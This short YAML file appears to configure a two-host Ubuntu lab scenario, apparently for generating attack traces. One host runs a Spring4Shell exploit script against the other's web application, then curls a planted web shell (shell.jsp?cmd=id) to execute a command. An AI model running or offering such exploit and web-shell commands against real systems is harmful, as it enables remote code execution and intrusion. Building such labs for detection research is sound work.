blueprint: ubuntu2204-ubuntu2204
ubuntu1:
  playbook: ubuntu1.yml
ubuntu2:
  playbook: ubuntu2.yml
  trace: "curl"
  command:
    - "python3 /opt/spring4shell/exploit.py --url \"http://%ubuntu1%:8080/helloworld/greeting\""
    - "sleep 30"
    - "curl http://%ubuntu1%:8080/shell.jsp?cmd=id"